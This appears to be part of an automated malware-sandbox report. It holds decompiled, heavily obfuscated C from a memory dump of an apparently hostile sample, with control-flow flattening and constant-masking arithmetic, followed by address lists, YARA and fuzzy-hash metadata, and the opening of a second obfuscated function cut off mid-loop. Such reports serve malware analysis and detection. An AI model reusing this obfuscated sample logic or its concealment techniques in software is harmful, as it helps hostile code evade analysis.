				_v64 = _v64 + 0xffff3fc4;
				_v64 = _v64 ^ 0xffff80c7;
				_v276 = 0x72;
				_v276 = _v276 * 0x7d;
				_v276 = _v276 + 0xffff8366;
				_v276 = _v276 >> 9;
				_v276 = _v276 ^ 0x007facee;
				_v44 = 0xf34a;
				_v44 = _v44 + 0xffffbf38;
				_v44 = _v44 ^ 0x00008263;
				_v112 = 0x1dc0;
				_v112 = _v112 ^ 0x2c6551d7;
				_v112 = _v112 ^ 0x2c653ad3;
				_v228 = 0xc596;
				_v228 = _v228 ^ 0x9ca21630;
				_v228 = _v228 ^ 0x8f0fd5bf;
				_v228 = _v228 ^ 0x13ad7fff;
				_v196 = 0x8cfa;
				_v196 = _v196 >> 1;
				_v196 = _v196 ^ 0xfb4b109c;
				_v196 = _v196 ^ 0xfb4b1bca;
				_v236 = 0x2fd6;
				_v236 = _v236 << 7;
				_v236 = _v236 << 2;
				_v236 = _v236 ^ 0x005fedce;
				_v180 = 0x51a5;
				_v180 = _v180 ^ 0x4af0041f;
				_v180 = _v180 + 0xfffff3cf;
				_v180 = _v180 ^ 0x4af05e30;
				_v244 = 0x8950;
				_v244 = _v244 << 0xc;
				_v244 = _v244 | 0xbaabdb8a;
				_v244 = _v244 ^ 0xbabf869d;
				_v40 = 0xc836;
				_v40 = _v40 + 0xffff3474;
				_v40 = _v40 ^ 0xffff8af1;
				_v176 = 0x9727;
				_v176 = _v176 + 0xffffb8fc;
				_v176 = _v176 >> 3;
				_v176 = _v176 ^ 0x00001e80;
				_v304 = 0x64c7;
				_v304 = _v304 + 0x56f7;
				_v304 = _v304 ^ 0x2de137fe;
				_v304 = _v304 + 0xaf99;
				_v304 = _v304 ^ 0x2de22ef8;
				_v308 = 0x2e06;
				_v308 = _v308 | 0x78777a1f;
				_v308 = _v308 * 0x79;
				_v308 = _v308 >> 3;
				_v308 = _v308 ^ 0x1e0f1828;
				_v92 = 0xc9a2;
				_v92 = _v92 | 0xf3c29ea2;
				_v92 = _v92 ^ 0xf3c28d84;
				_v100 = 0xecbf;
				_v100 = _v100 + 0xffff0faf;
				_v100 = _v100 ^ 0xffffc0a5;
				_v192 = 0x95e0;
				_v192 = _v192 << 8;
				_v192 = _v192 << 9;
				_v192 = _v192 ^ 0x2bc00f3b;
				_v200 = 0x7c40;
				_t780 = 0x3a;
				_v200 = _v200 / _t780;
				_v200 = _v200 << 8;
				_v200 = _v200 ^ 0x000244df;
				_v272 = 0x7605;
				_v272 = _v272 << 5;
				_v272 = _v272 + 0xffffdeaf;
				_v272 = _v272 >> 0xb;
				_v272 = _v272 ^ 0x00001482;
				_v108 = 0x1c78;
				_v108 = _v108 + 0x3c33;
				_v108 = _v108 ^ 0x00006c40;
				_v280 = 0xd61a;
				_v280 = _v280 ^ 0xfb8fe6a7;
				_v280 = _v280 + 0x5fc;
				_v280 = _v280 | 0xbad3e440;
				_v280 = _v280 ^ 0xfbdf8156;
				_v288 = 0x89a2;
				_v288 = _v288 + 0xffff4641;
				_v288 = _v288 >> 0xc;
				_v288 = _v288 >> 0xd;
				_v288 = _v288 ^ 0x000071e8;
				_v252 = 0xe21c;
				_v252 = _v252 ^ 0x457ecc8f;
				_t781 = 0x67;
				_v252 = _v252 * 0x59;
				_v252 = _v252 ^ 0x28de7ded;
				_v84 = 0xe1;
				_v84 = _v84 >> 3;
				_v84 = _v84 ^ 0x00001e3a;
				_v184 = 0xbeeb;
				_v184 = _v184 * 0x12;
				_v184 = _v184 + 0x8ae1;
				_v184 = _v184 ^ 0x000de1ad;
				_v68 = 0xfd10;
				_v68 = _v68 >> 0xf;
				_v68 = _v68 ^ 0x000036f7;
				_v76 = 0x1f03;
				_v76 = _v76 * 0x49;
				_v76 = _v76 ^ 0x000897f9;
				_v264 = 0xf0d9;
				_v264 = _v264 * 0x66;
				_v264 = _v264 + 0xffffb5cf;
				_v264 = _v264 + 0xea22;
				_v264 = _v264 ^ 0x0060dcb6;
				_v168 = 0xdfa9;
				_v168 = _v168 ^ 0x7c3d7298;
				_v168 = _v168 ^ 0xd2777362;
				_v168 = _v168 ^ 0xae4ad343;
				_v72 = 0x8534;
				_v72 = _v72 ^ 0x085524ca;
				_v72 = _v72 ^ 0x085595c2;
				_v136 = 0x90f3;
				_v136 = _v136 + 0xcfad;
				_v136 = _v136 ^ 0x00017ab2;
				_v220 = 0x7eee;
				_v220 = _v220 >> 3;
				_v220 = _v220 + 0xffffea23;
				_v220 = _v220 ^ 0xffffcf89;
				_v164 = 0x31cc;
				_v164 = _v164 | 0x82d13576;
				_v164 = _v164 >> 3;
				_v164 = _v164 ^ 0x105a14dc;
				_v284 = 0xab9f;
				_v284 = _v284 / _t781;
				_v284 = _v284 + 0xffff982b;
				_v284 = _v284 + 0xcf45;
				_v284 = _v284 ^ 0x000072b9;
				_v80 = 0x4458;
				_v80 = _v80 + 0xfa7e;
				_v80 = _v80 ^ 0x000168e1;
				_v128 = 0x89b9;
				_v128 = _v128 + 0xe32e;
				_v128 = _v128 ^ 0x00010bac;
				_v172 = 0xe617;
				_v172 = _v172 << 4;
				_v172 = _v172 + 0xb499;
				_v172 = _v172 ^ 0x000f5cd6;
				_v212 = 0x2b1d;
				_v212 = _v212 << 0x10;
				_t782 = 0x21;
				_v212 = _v212 * 0x7f;
				_v212 = _v212 ^ 0x63636a51;
				_v188 = 0x87b6;
				_v188 = _v188 | 0xa87ad713;
				_v188 = _v188 << 3;
				_v188 = _v188 ^ 0x43d6c05c;
				_v60 = 0x1ec0;
				_v60 = _v60 / _t782;
				_v60 = _v60 ^ 0x000042c8;
				_v256 = 0x1798;
				_v256 = _v256 ^ 0x8091dd24;
				_v256 = _v256 | 0xdc47dedf;
				_t783 = 0x19;
				_v256 = _v256 * 0x5d;
				_v256 = _v256 ^ 0x3a6c6c2e;
				_v160 = 0x6f3f;
				_v160 = _v160 / _t783;
				_t784 = 0x73;
				_t785 = _v20;
				_v160 = _v160 / _t784;
				_v160 = _v160 ^ 0x00005ad1;
				while(1) {
					L1:
					_t758 = 0x1fbed331;
					while(1) {
						_t797 = _t786 - _t758;
						if(_t797 <= 0) {
						}
						L3:
						if(_t797 == 0) {
							__eflags = E00225B79(_t785, _v20);
							_t786 = 0x1b724d6a;
							_t679 = 1;
							_t793 =  !=  ? _t679 : _t793;
							L13:
							_t666 = _v316;
							L14:
							_t707 = _v320;
							goto L1;
						}
						if(_t786 == 0xa0d70be) {
							__eflags = _t694;
							if(_t694 == 0) {
								_t718 = 0;
								__eflags = 0;
							} else {
								_t718 =  *_t694;
							}
							__eflags = _t694;
							if(_t694 == 0) {
								_t680 = 0;
								__eflags = 0;
							} else {
								_t680 =  *((intOrPtr*)(_t694 + 4));
							}
							E00238422(_v72, _v136, _v220, _a28, _t785, _t680, _t718, _v164, _t718);
							_t795 = _t795 + 0x1c;
							asm("sbb esi, esi");
							_t786 = (_t786 & 0x1873afa8) + 0x1b724d6a;
							goto L13;
						}
						if(_t786 == 0xcd25e5e) {
							_t786 = 0x25fbc0d1;
							while(1) {
								_t797 = _t786 - _t758;
								if(_t797 <= 0) {
								}
								goto L25;
							}
							goto L3;
						}
						if(_t786 == 0xdfc12f5) {
							_t666 = E00237955(_a20, _v228, _v196, _t707, _v236, _v180, _t707, _v244, _v40, _v144, _a12, _t707, _v32, _t707, _v176);
							_t795 = _t795 + 0x34;
							_v316 = _t666;
							__eflags = _t666;
							_t786 =  !=  ? 0x20246154 : 0x1e7ff602;
							goto L14;
						}
						if(_t786 == 0x1b724d6a) {
							E00227925(_v284, _t785, _v80, _v128);
							_t786 = 0x2cd2473d;
							L12:
							goto L13;
						}
						if(_t786 != 0x1e7ff602) {
							L45:
							__eflags = _t786 - 0x258a7eda;
							if(_t786 == 0x258a7eda) {
								L10:
								return _t793;
							}
							_t666 = _v316;
							continue;
						}
						E00227925(_v60, _v32, _v256, _v160);
						goto L10;
						L25:
						__eflags = _t786 - 0x20246154;
						if(_t786 == 0x20246154) {
							__eflags = _t694;
							if(__eflags == 0) {
								_t787 = _v16;
							} else {
								_push(_v308);
								_t667 = E0023889D(0x23c850, _v304, __eflags);
								_t787 = _t667;
								_v16 = _t667;
							}
							_t785 = E00221BD7(_v152 | _v296 | _v216 | _v148 | _v140 | _v132 | _v124 | _v116 | _v208, _v92, _v100, _v192, _v200, _v152 | _v296 | _v216 | _v148 | _v140 | _v132 | _v124 | _v116 | _v208, _v316, _v152 | _v296 | _v216 | _v148 | _v140 | _v132 | _v124 | _v116 | _v208, _t705, _v272, _t787, _v108, _a24, _t705, _v280, _v288);
							_t706 = _v252;
							E00232025(_t706, _t787, _v84, _v184);
							_t795 = _t795 + 0x40;
							__eflags = _t785;
							if(_t785 == 0) {
								_t786 = 0x2cd2473d;
								L44:
								_t707 = _v320;
								_t758 = 0x1fbed331;
								goto L45;
							}
							_push(_t706);
							_v28 = 1;
							_t693 = E00236AFF(_v68, _v76, _v264,  &_v28, _v168, _t785);
							_t795 = _t795 + 0x18;
							_v28 = _t693;
							_t786 = 0xa0d70be;
							goto L13;
						}
						__eflags = _t786 - 0x25fbc0d1;
						if(_t786 == 0x25fbc0d1) {
							_push(0x200);
							_v24 = 0x200;
							_t788 = E00228736(0x200);
							_t712 = 0x200;
							__eflags = _t788;
							if(_t788 != 0) {
								_t687 = E0022F74E(_t712, _t788,  &_v24, _v96, _v240, _v248);
								_t795 = _t795 + 0x10;
								__eflags = _t687;
								if(_t687 == 0) {
									_t689 = E00230F0C(_v88, _t788, _t712, _v36, _v232, _t712, _v260);
									_t795 = _t795 + 0x14;
									_v320 = _t689;
								}
								E0022F536(_v224, _v48, _v312, _t788);
							}
							_t786 = 0x276816a4;
							goto L13;
						}
						__eflags = _t786 - 0x276816a4;
						if(_t786 == 0x276816a4) {
							_push(_t707);
							_t672 = E00225A52(_t707, _t707, _v300, _v268, _v204, _v64, _v120);
							__eflags = _t672;
							_v32 = _t672;
							_t786 =  !=  ? 0xdfc12f5 : 0x258a7eda;
							E0022F536(_v276, _v44, _v112, _v320);
							_t795 = _t795 + 0x24;
							goto L44;
						}
						__eflags = _t786 - 0x2cd2473d;
						if(_t786 == 0x2cd2473d) {
							E00227925(_v172, _t666, _v212, _v188);
							_t786 = 0x1e7ff602;
							goto L12;
						}
						__eflags = _t786 - 0x33e5fd12;
						if(__eflags != 0) {
							goto L45;
						}
						__eflags = E0023687F(_t785, _v156, __eflags) - _v52;
						_t758 = 0x1fbed331;
						_t666 = _v316;
						_t707 = _v320;
						_t786 =  ==  ? 0x1fbed331 : 0x1b724d6a;
					}
				}
			}



















































































































                                              0x0022c777
                                              0x0022c77c
                                              0x0022c786
                                              0x0022c78d
                                              0x0022c794
                                              0x0022c79b
                                              0x0022c7a2
                                              0x0022c7a9
                                              0x0022c7aa
                                              0x0022c7b1
                                              0x0022c7b8
                                              0x0022c7bf
                                              0x0022c7c6
                                              0x0022c7c7
                                              0x0022c7c8
                                              0x0022c7cd
                                              0x0022c7da
                                              0x0022c7e3
                                              0x0022c7ea
                                              0x0022c7ec
                                              0x0022c7f3
                                              0x0022c7f6
                                              0x0022c7fe
                                              0x0022c803
                                              0x0022c808
                                              0x0022c80d
                                              0x0022c815
                                              0x0022c820
                                              0x0022c828
                                              0x0022c830
                                              0x0022c83b
                                              0x0022c846
                                              0x0022c851
                                              0x0022c85c
                                              0x0022c867
                                              0x0022c872
                                              0x0022c87d
                                              0x0022c888
                                              0x0022c893
                                              0x0022c89e
                                              0x0022c8a9
                                              0x0022c8b4
                                              0x0022c8bf
                                              0x0022c8ca
                                              0x0022c8d2
                                              0x0022c8dd
                                              0x0022c8e8
                                              0x0022c8f0
                                              0x0022c8fb
                                              0x0022c906
                                              0x0022c90e
                                              0x0022c919
                                              0x0022c921
                                              0x0022c929
                                              0x0022c92e
                                              0x0022c936
                                              0x0022c93e
                                              0x0022c943
                                              0x0022c94b
                                              0x0022c950
                                              0x0022c958
                                              0x0022c963
                                              0x0022c972
                                              0x0022c976
                                              0x0022c97d
                                              0x0022c988
                                              0x0022c993
                                              0x0022c99b
                                              0x0022c9a3
                                              0x0022c9ae
                                              0x0022c9b9
                                              0x0022c9c4
                                              0x0022c9da
                                              0x0022c9df
                                              0x0022c9e8
                                              0x0022c9f3
                                              0x0022ca05
                                              0x0022ca0a
                                              0x0022ca13
                                              0x0022ca1e
                                              0x0022ca26
                                              0x0022ca33
                                              0x0022ca36
                                              0x0022ca3a
                                              0x0022ca3f
                                              0x0022ca47
                                              0x0022ca5d
                                              0x0022ca64
                                              0x0022ca6f
                                              0x0022ca77
                                              0x0022ca7f
                                              0x0022ca84
                                              0x0022ca8c
                                              0x0022ca98
                                              0x0022ca9d
                                              0x0022caa3
                                              0x0022caab
                                              0x0022cab3
                                              0x0022cac6
                                              0x0022cac9
                                              0x0022cad0
                                              0x0022cadb
                                              0x0022caf1
                                              0x0022caf8
                                              0x0022cb03
                                              0x0022cb0b
                                              0x0022cb10
                                              0x0022cb15
                                              0x0022cb1a
                                              0x0022cb22
                                              0x0022cb2a
                                              0x0022cb37
                                              0x0022cb38
                                              0x0022cb3c
                                              0x0022cb44
                                              0x0022cb4f
                                              0x0022cb5a
                                              0x0022cb65
                                              0x0022cb6d
                                              0x0022cb75
                                              0x0022cb80
                                              0x0022cb84
                                              0x0022cb8c
                                              0x0022cb94
                                              0x0022cb99
                                              0x0022cb9e
                                              0x0022cba2
                                              0x0022cbac
                                              0x0022cbba
                                              0x0022cbbd
                                              0x0022cbc1
                                              0x0022cbc9
                                              0x0022cbce
                                              0x0022cbd6
                                              0x0022cbe1
                                              0x0022cbec
                                              0x0022cbf4
                                              0x0022cbff
                                              0x0022cc0a
                                              0x0022cc15
                                              0x0022cc20
                                              0x0022cc2d
                                              0x0022cc31
                                              0x0022cc39
                                              0x0022cc3e
                                              0x0022cc46
                                              0x0022cc51
                                              0x0022cc5c
                                              0x0022cc67
                                              0x0022cc72
                                              0x0022cc7d
                                              0x0022cc88
                                              0x0022cc90
                                              0x0022cc98
                                              0x0022cca0
                                              0x0022cca8
                                              0x0022ccb3
                                              0x0022ccba
                                              0x0022ccc5
                                              0x0022ccd0
                                              0x0022ccd8
                                              0x0022ccdd
                                              0x0022cce2
                                              0x0022ccea
                                              0x0022ccf5
                                              0x0022cd00
                                              0x0022cd0b
                                              0x0022cd16
                                              0x0022cd1e
                                              0x0022cd23
                                              0x0022cd2b
                                              0x0022cd33
                                              0x0022cd3e
                                              0x0022cd49
                                              0x0022cd54
                                              0x0022cd5f
                                              0x0022cd6a
                                              0x0022cd72
                                              0x0022cd7d
                                              0x0022cd85
                                              0x0022cd8d
                                              0x0022cd95
                                              0x0022cd9d
                                              0x0022cda5
                                              0x0022cdad
                                              0x0022cdba
                                              0x0022cdbe
                                              0x0022cdc3
                                              0x0022cdcb
                                              0x0022cdd6
                                              0x0022cde1
                                              0x0022cdec
                                              0x0022cdf7
                                              0x0022ce02
                                              0x0022ce0d
                                              0x0022ce18
                                              0x0022ce20
                                              0x0022ce28
                                              0x0022ce35
                                              0x0022ce49
                                              0x0022ce4e
                                              0x0022ce57
                                              0x0022ce5f
                                              0x0022ce6a
                                              0x0022ce72
                                              0x0022ce77
                                              0x0022ce7f
                                              0x0022ce84
                                              0x0022ce8c
                                              0x0022ce97
                                              0x0022cea2
                                              0x0022cead
                                              0x0022ceb5
                                              0x0022cebd
                                              0x0022cec5
                                              0x0022cecd
                                              0x0022ced5
                                              0x0022cedd
                                              0x0022cee5
                                              0x0022ceea
                                              0x0022ceef
                                              0x0022cef7
                                              0x0022ceff
                                              0x0022cf0c
                                              0x0022cf0d
                                              0x0022cf11
                                              0x0022cf19
                                              0x0022cf24
                                              0x0022cf2c
                                              0x0022cf37
                                              0x0022cf4a
                                              0x0022cf51
                                              0x0022cf5c
                                              0x0022cf67
                                              0x0022cf72
                                              0x0022cf7a
                                              0x0022cf85
                                              0x0022cf98
                                              0x0022cf9f
                                              0x0022cfaa
                                              0x0022cfb7
                                              0x0022cfbb
                                              0x0022cfc3
                                              0x0022cfcb
                                              0x0022cfd3
                                              0x0022cfde
                                              0x0022cfe9
                                              0x0022cff4
                                              0x0022cfff
                                              0x0022d00a
                                              0x0022d015
                                              0x0022d020
                                              0x0022d02b
                                              0x0022d036
                                              0x0022d041
                                              0x0022d049
                                              0x0022d04e
                                              0x0022d056
                                              0x0022d05e
                                              0x0022d069
                                              0x0022d074
                                              0x0022d07c
                                              0x0022d087
                                              0x0022d095
                                              0x0022d099
                                              0x0022d0a1
                                              0x0022d0a9
                                              0x0022d0b1
                                              0x0022d0bc
                                              0x0022d0c7
                                              0x0022d0d2
                                              0x0022d0df
                                              0x0022d0ea
                                              0x0022d0f5
                                              0x0022d100
                                              0x0022d108
                                              0x0022d113
                                              0x0022d11e
                                              0x0022d126
                                              0x0022d132
                                              0x0022d135
                                              0x0022d13c
                                              0x0022d147
                                              0x0022d152
                                              0x0022d15d
                                              0x0022d165
                                              0x0022d170
                                              0x0022d186
                                              0x0022d18d
                                              0x0022d198
                                              0x0022d1a0
                                              0x0022d1a8
                                              0x0022d1b5
                                              0x0022d1b8
                                              0x0022d1bc
                                              0x0022d1c4
                                              0x0022d1da
                                              0x0022d1e8
                                              0x0022d1eb
                                              0x0022d1f2
                                              0x0022d1f9
                                              0x0022d208
                                              0x0022d208
                                              0x0022d208
                                              0x0022d20d
                                              0x0022d20d
                                              0x0022d20f
                                              0x0022d20f
                                              0x0022d215
                                              0x0022d215
                                              0x0022d386
                                              0x0022d388
                                              0x0022d38f
                                              0x0022d390
                                              0x0022d29d
                                              0x0022d29d
                                              0x0022d2a1
                                              0x0022d2a1
                                              0x00000000
                                              0x0022d2a1
                                              0x0022d221
                                              0x0022d31f
                                              0x0022d321
                                              0x0022d327
                                              0x0022d327
                                              0x0022d323
                                              0x0022d323
                                              0x0022d323
                                              0x0022d329
                                              0x0022d32b
                                              0x0022d332
                                              0x0022d332
                                              0x0022d32d
                                              0x0022d32d
                                              0x0022d32d
                                              0x0022d35b
                                              0x0022d360
                                              0x0022d365
                                              0x0022d36d
                                              0x00000000
                                              0x0022d36d
                                              0x0022d22d
                                              0x0022d315
                                              0x0022d20d
                                              0x0022d20d
                                              0x0022d20f
                                              0x0022d20f
                                              0x00000000
                                              0x0022d20f
                                              0x00000000
                                              0x0022d20d
                                              0x0022d23a
                                              0x0022d2f8
                                              0x0022d2fd
                                              0x0022d300
                                              0x0022d304
                                              0x0022d310
                                              0x00000000
                                              0x0022d310
                                              0x0022d242
                                              0x0022d291
                                              0x0022d296
                                              0x0022d29b
                                              0x00000000
                                              0x0022d29c
                                              0x0022d24a
                                              0x0022d639
                                              0x0022d639
                                              0x0022d63f
                                              0x0022d272
                                              0x0022d27c
                                              0x0022d27c
                                              0x0022d645
                                              0x00000000
                                              0x0022d645
                                              0x0022d269
                                              0x00000000
                                              0x0022d398
                                              0x0022d398
                                              0x0022d39e
                                              0x0022d51a
                                              0x0022d51c
                                              0x0022d53c
                                              0x0022d51e
                                              0x0022d51e
                                              0x0022d52b
                                              0x0022d530
                                              0x0022d533
                                              0x0022d533
                                              0x0022d5c9
                                              0x0022d5d2
                                              0x0022d5d9
                                              0x0022d5de
                                              0x0022d5e1
                                              0x0022d5e3
                                              0x0022d62b
                                              0x0022d630
                                              0x0022d630
                                              0x0022d634
                                              0x00000000
                                              0x0022d634
                                              0x0022d5e5
                                              0x0022d5f1
                                              0x0022d612
                                              0x0022d617
                                              0x0022d61a
                                              0x0022d621
                                              0x00000000
                                              0x0022d621
                                              0x0022d3a4
                                              0x0022d3aa
                                              0x0022d498
                                              0x0022d49a
                                              0x0022d4a6
                                              0x0022d4a9
                                              0x0022d4aa
                                              0x0022d4ac
                                              0x0022d4c7
                                              0x0022d4cc
                                              0x0022d4cf
                                              0x0022d4d1
                                              0x0022d4ed
                                              0x0022d4f2
                                              0x0022d4f5
                                              0x0022d4f5
                                              0x0022d509
                                              0x0022d50f
                                              0x0022d510
                                              0x00000000
                                              0x0022d510
                                              0x0022d3b0
                                              0x0022d3b6
                                              0x0022d423
                                              0x0022d442
                                              0x0022d447
                                              0x0022d449
                                              0x0022d45a
                                              0x0022d474
                                              0x0022d479
                                              0x00000000
                                              0x0022d479
                                              0x0022d3b8
                                              0x0022d3be
                                              0x0022d414
                                              0x0022d419
                                              0x00000000
                                              0x0022d419
                                              0x0022d3c0
                                              0x0022d3c6
                                              0x00000000
                                              0x00000000
                                              0x0022d3e6
                                              0x0022d3e8
                                              0x0022d3ed
                                              0x0022d3f1
                                              0x0022d3f5
                                              0x0022d3f5
                                              0x0022d20d

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: "$.ll:$.$?o$@l$@|$Qjcc$T$Ta$ $Ta$ $XD$^$m^$r$rW$,$3$q$~
                                              • API String ID: 0-3595463394
                                              • Opcode ID: e94679bf9348efdbdc226952b709604b865745a13453338fa8c2dde984944914
                                              • Instruction ID: e639dbbf195966caf37042e01c59241edc7458d80d03cc0a05b19e41440a97a2
                                              • Opcode Fuzzy Hash: e94679bf9348efdbdc226952b709604b865745a13453338fa8c2dde984944914
                                              • Instruction Fuzzy Hash: 5E721F71508381DBE3B8CF65D54AB9BBBE1BBC4304F108A1DE5D9862A0DBB58859CF43
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0022D7EB, Relevance: 21.6, Strings: 17, Instructions: 347COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 98%
                                              			E0022D7EB() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				signed int _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _v1164;
				signed int _v1168;
				signed int _v1172;
				signed int _v1176;
				signed int _v1180;
				signed int _v1184;
				signed int _v1188;
				signed int _v1192;
				signed int _v1196;
				signed int _v1200;
				signed int _v1204;
				signed int _v1208;
				signed int _v1212;
				void* _t365;
				intOrPtr _t367;
				signed int _t379;
				void* _t380;
				void* _t399;
				intOrPtr _t402;
				signed int _t408;
				intOrPtr _t409;
				intOrPtr* _t410;
				signed int _t411;
				signed int _t412;
				signed int _t413;
				signed int _t414;
				signed int _t416;
				signed int* _t417;
				void* _t419;

				_t417 =  &_v1212;
				_v1164 = 0xe848;
				_v1164 = _v1164 << 0xc;
				_t380 = 0xeb1d0fe;
				_v1164 = _v1164 << 2;
				_v1164 = _v1164 ^ 0x3a120029;
				_v1196 = 0xb50a;
				_v1196 = _v1196 * 0x54;
				_v1196 = _v1196 << 1;
				_v1196 = _v1196 << 0xc;
				_v1196 = _v1196 ^ 0x6ce97179;
				_v1072 = 0xa1a9;
				_v1072 = _v1072 >> 6;
				_v1072 = _v1072 ^ 0x00006740;
				_v1112 = 0x5ab8;
				_v1112 = _v1112 | 0xd40f1486;
				_v1112 = _v1112 ^ 0xd40f3c8d;
				_v1168 = 0x99b2;
				_v1168 = _v1168 ^ 0x8e209920;
				_v1168 = _v1168 + 0x17b0;
				_v1168 = _v1168 + 0xffff252c;
				_v1168 = _v1168 ^ 0x8e1f3ab7;
				_v1108 = 0x6700;
				_v1108 = _v1108 ^ 0xd74b138d;
				_v1108 = _v1108 ^ 0xd74b4d2a;
				_v1116 = 0xa6d3;
				_v1116 = _v1116 << 0xc;
				_v1116 = _v1116 ^ 0x0a6d47ef;
				_v1144 = 0x46d4;
				_v1144 = _v1144 | 0x60392883;
				_t411 = 0x3e;
				_v1052 = _v1052 & 0x00000000;
				_v1144 = _v1144 / _t411;
				_v1144 = _v1144 ^ 0x018d3ef5;
				_v1212 = 0x195d;
				_v1212 = _v1212 + 0x9a8f;
				_v1212 = _v1212 >> 2;
				_v1212 = _v1212 >> 0xf;
				_v1212 = _v1212 ^ 0x00005610;
				_v1092 = 0x8c48;
				_v1092 = _v1092 | 0x14bcb660;
				_v1092 = _v1092 ^ 0x14bcd719;
				_v1184 = 0xdf30;
				_v1184 = _v1184 | 0x71150163;
				_v1184 = _v1184 + 0xffff3ca6;
				_v1184 = _v1184 >> 5;
				_v1184 = _v1184 ^ 0x03888299;
				_v1100 = 0xf0a2;
				_v1100 = _v1100 >> 2;
				_v1100 = _v1100 ^ 0x00007018;
				_v1076 = 0xde4e;
				_v1076 = _v1076 * 0x25;
				_v1076 = _v1076 ^ 0x0020254d;
				_v1084 = 0x8f7c;
				_v1084 = _v1084 + 0x3023;
				_v1084 = _v1084 ^ 0x00008967;
				_v1136 = 0x4c3;
				_v1136 = _v1136 + 0xbbe6;
				_v1136 = _v1136 | 0x03b94668;
				_v1136 = _v1136 ^ 0x03b9f10c;
				_v1120 = 0xdab0;
				_v1120 = _v1120 << 2;
				_v1120 = _v1120 ^ 0x0003158f;
				_v1080 = 0xb6c1;
				_v1080 = _v1080 ^ 0x2339c7b2;
				_v1080 = _v1080 ^ 0x2339156d;
				_v1152 = 0xaa63;
				_v1152 = _v1152 | 0x7d17af71;
				_v1152 = _v1152 << 0xc;
				_v1152 = _v1152 ^ 0x7af75802;
				_v1088 = 0x49a;
				_v1088 = _v1088 >> 9;
				_v1088 = _v1088 ^ 0x00004f36;
				_v1192 = 0x2678;
				_v1192 = _v1192 + 0xb679;
				_v1192 = _v1192 << 0x10;
				_v1192 = _v1192 + 0xffff3370;
				_v1192 = _v1192 ^ 0xdcf068a3;
				_v1064 = 0xeafb;
				_v1064 = _v1064 << 1;
				_v1064 = _v1064 ^ 0x00019538;
				_v1096 = 0x88f8;
				_t412 = 0x34;
				_v1096 = _v1096 * 0x4f;
				_v1096 = _v1096 ^ 0x002a1ade;
				_v1132 = 0xf8dd;
				_v1132 = _v1132 << 0xb;
				_v1132 = _v1132 * 6;
				_v1132 = _v1132 ^ 0x2ea92e25;
				_v1148 = 0xb66c;
				_v1148 = _v1148 * 0x79;
				_v1148 = _v1148 * 0x37;
				_v1148 = _v1148 ^ 0x12863225;
				_v1044 = 0x2ced;
				_v1044 = _v1044 | 0x6c1d274b;
				_v1044 = _v1044 ^ 0x6c1d554c;
				_v1104 = 0xd4fb;
				_v1104 = _v1104 + 0xc222;
				_v1104 = _v1104 ^ 0x0001c0a4;
				_v1140 = 0xeff1;
				_v1140 = _v1140 | 0x2c578e17;
				_v1140 = _v1140 ^ 0x1f5808a8;
				_v1140 = _v1140 ^ 0x330f90e2;
				_v1156 = 0x54a4;
				_v1156 = _v1156 ^ 0xe69aec3e;
				_v1156 = _v1156 ^ 0x7a062859;
				_v1156 = _v1156 ^ 0x9c9c8f10;
				_v1180 = 0xa2be;
				_v1180 = _v1180 / _t412;
				_v1180 = _v1180 << 0xb;
				_v1180 = _v1180 << 6;
				_v1180 = _v1180 ^ 0x0642737d;
				_v1204 = 0x65ae;
				_v1204 = _v1204 + 0xb2b7;
				_v1204 = _v1204 + 0xbb73;
				_v1204 = _v1204 << 6;
				_v1204 = _v1204 ^ 0x0074b164;
				_v1176 = 0x3ecd;
				_v1176 = _v1176 | 0x1d534930;
				_v1176 = _v1176 << 0xa;
				_v1176 = _v1176 ^ 0x842f9ee3;
				_v1176 = _v1176 ^ 0xc9d04901;
				_v1056 = 0xf360;
				_v1056 = _v1056 | 0x93122b66;
				_v1056 = _v1056 ^ 0x9312fd26;
				_v1124 = 0x4a26;
				_v1124 = _v1124 | 0x286a3d77;
				_v1124 = _v1124 ^ 0x286a2522;
				_v1060 = 0x57ed;
				_v1060 = _v1060 + 0x784b;
				_v1060 = _v1060 ^ 0x0000c3a5;
				_v1068 = 0x69c7;
				_v1068 = _v1068 << 5;
				_v1068 = _v1068 ^ 0x000d6de9;
				_v1208 = 0xffbd;
				_v1208 = _v1208 * 0x3d;
				_v1208 = _v1208 << 5;
				_v1208 = _v1208 + 0x87f5;
				_v1208 = _v1208 ^ 0x079ed184;
				_v1128 = 0x5d27;
				_v1128 = _v1128 >> 0xc;
				_v1128 = _v1128 ^ 0x62edd6dc;
				_v1128 = _v1128 ^ 0x62ed9c54;
				_v1048 = 0x8776;
				_t413 = 0x1e;
				_t408 = _v1052;
				_v1048 = _v1048 * 0xc;
				_v1048 = _v1048 ^ 0x000959b7;
				_v1172 = 0x35cb;
				_t379 = _v1052;
				_v1172 = _v1172 / _t413;
				_v1172 = _v1172 | 0x92682d74;
				_v1172 = _v1172 ^ 0x346a72ec;
				_v1172 = _v1172 ^ 0xa6025f11;
				_v1188 = 0x8f0f;
				_t414 = 0x66;
				_t416 = _v1052;
				_v1188 = _v1188 / _t414;
				_v1188 = _v1188 << 5;
				_v1188 = _v1188 + 0x12e7;
				_v1188 = _v1188 ^ 0x00003fc5;
				_v1200 = 0x51b9;
				_v1200 = _v1200 | 0x17a7f9cb;
				_v1200 = _v1200 << 8;
				_v1200 = _v1200 | 0xe40f2208;
				_v1200 = _v1200 ^ 0xe7fffb08;
				_v1160 = 0x57cd;
				_v1160 = _v1160 + 0xffffc371;
				_v1160 = _v1160 ^ 0x54a04296;
				_v1160 = _v1160 ^ 0x54a059b8;
				while(1) {
					L1:
